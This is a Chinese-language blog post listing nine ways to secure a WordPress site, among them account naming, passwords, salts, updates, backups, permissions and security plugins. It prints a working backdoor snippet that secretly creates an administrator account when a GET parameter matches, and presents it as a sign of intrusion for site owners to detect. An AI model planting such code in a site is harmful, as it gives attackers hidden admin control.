您的位置:首页 » Wordpress » 正文

让WordPress网站更加安全的9个方法

每一个网站都面临着很多威胁,哪怕是BAT,只不过他们防护做得好,几乎无懈可击。所以如何保障网站安全就变得极其重要了。以下9个方法可以使WordPress网站变得更加安全,当然你也可以根据下面的审查下自己网站是否还有优化的地方。

不要使用admin作为管理员登录名

admin是WordPress的默认管理员,你可以在网站后台的’用户’中看到是否存在这个用户名,如果存在,新建一个超级管理员,再删除它,或者我们也可以直接登录数据库修改用户名,找到用户表(如wp_users),然后双击修改user_login字段,改成你认为安全的管理员登录名。

使用更加复杂安全的登录密码

既然用户名很重要,那么登录密码同样不可忽视,越是复杂的密码,就越难被黑客破解,所以我们需要对超级管理员设置更安全的密码。

如果你实在想不出哪个密码更安全,我建议使用WordPress后台生成的,在WordPress4以上版本中可以通过后台-用户-编辑个人资料,拉到最下面的“账户管理”,有个生成密码案按钮,点击生成即可。它还可以用来作为密码强弱的验证工具。

除此以外,还可以考虑WordPress的两步验证插件,因为我还没使用过,所以这里不推荐使用使用哪款插件更加合适。

修改身份认证密钥与盐

有必要修改wp-config.php配置文件中从第45行的身份认证密钥与盐,这个可以直接在 https://api.wordpress.org/secret-key/1.1/salt/中生成,然后粘贴在这里。如下图:

WordPress秘钥与盐

及时升级WordPress、插件、主题

WordPress升级的意义一来是修复漏洞,二来是增加新功能,所以需要及时同步更新,升级也很简单,直接后台点击更新即可。不过在升级前最好备份下程序数据。同时检查下安装的插件是否有需要更新的。卸载那些不常用或者作者已经停止维护的插件。

对于主题,亦是如此,将不用的主题也删除,仅保留启用的或者默认的主题。

清理僵尸用户

有用户躺着它不一定是不活跃的用户,有可能是潜伏在后台的用于黑客登录的入口用户。所以一定要加以小心,如果不是特别需要,请不要启用允许所有用户注册功能。

制定一个网站备份计划

WordPress网站备份分数据库和WordPress的wp-content文件夹,数据库可安装一个备份插件,我用过的有WordPress Database Backup,地址在这: https://wordpress.org/plugins/wp-db-backup/,它可以按计划自动备份,且可以指定备份位置,比如是主机中还是通过Email发送到你指定的邮件。

至于wp-content文件夹,可以通过FTP软件备份到本地文件夹。里面包含的是主题、图片、插件。

检查主题的function.php文件

与你本地正常的function.php文件进行比较,如果发现多了代码,立马删除,并检查主题文件是否还有其他代码判断,检测的办法就是通过ftp查看文件夹或文件修改时间是否有异常。

如果有以下代码,则要特别小心,你的网站已经被入侵了!

  1. <?php
  2. add_action( ‘wp_head’, ‘my_back’ );
  3. function my_back() {
  4.     if ( $_GET[‘back’] == ’42rfb0n2′ ) {
  5.         require( ‘wp-includes/registration.php’ );
  6.         if ( !username_exists( ‘mr_admin’ ) ) {
  7.             $user_id = wp_create_user( ‘guest’, ’42rfb0n2′ );
  8.             $user = new WP_User( $user_id );
  9.             $user->set_role( ‘administrator’ );
  10.         }
  11.     }
  12. }
  13. ?>

设置网站的文件夹及文件访问权限

建议使用Linux系统的主机,文件安全策略应该遵循:文件夹权限为755,文件权限为644。
及时查看网站目录有没有莫名其妙的文件夹或者文件出现。

使用WordPress安全插件

在完成以上所有工作后,它还只是基础的,就好比一台电脑,还差个杀毒软件或者防火墙。我使用过2款安全插件,效果可以,至少能保抵御大部分的攻击。这2款插件是:

  • Wordfence Security
    这款插件主要的特色是拥有防火墙功能,加强的登录保护,只要有用户登录就会发送Email到管理员指定的邮箱。它还拥有统计功能,统计每天被攻击的次数与来源。如果网站文件被修改过,也会邮件通知。
    Wordfence Security统计功能
    这款插件有免费版和收费版,免费的已经很厚道了。建议一般用户使用免费版即可。
    想要了解插件更多的功能,请点击:
    https://wordpress.org/plugins/wordfence/
    推荐指数:5颗星。
  • WP Cerber Security
    该插件同样很强大,它可通过限制通过登录表单,XML-RPC / REST API请求或使用验证cookie的登录尝试次数来保护WordPress免受暴力攻击。
    限制使用黑色IP访问列表和白色IP访问列表进行访问。
    通过强大的电子邮件,移动和桌面通知来跟踪用户和入侵者的活动。

想要了解插件更多的功能,请点击:
https://wordpress.org/plugins/wp-cerber/
推荐指数:5颗星。

以上两款插件可以并存,也就意味着你可以选择任意一款,也可以同时安装两款插件。不过要注意的是,他们会新建很多数据库表以便记录所需信息。

小结

作为网站的管理者或者运营者,根据以上的方法都实施一遍,会使网站变得更加安全。
如果看完这篇文章还不知道如何实施的,请下方留言或者与我联系:mr.kouok@qq.com。

如需转载,请注明出处!

Tags:
  • 有4,575次围观
除特别声明外, 本站所有内容皆为原创,转载时请务必以超链接形式标明文章出处和作者信息
本文最后更新于2017年8月14日,已超过 1 年没有更新,部分内容或许已经不适用,请知悉,谢谢!

分享给我的好友看看:

 

关于作者:

贡献:kouok已经在第三评发表85篇文章了,你也来试试

简介:互联网从业者、WEB前端开发讲师;一WordPress工作室负责人、博主、站长。从小到大折腾过很多东西,也尝试了很多。招第三评测网编辑、合伙人

Ta的专栏 | 新浪微薄 | 腾讯微薄 | 其他SNS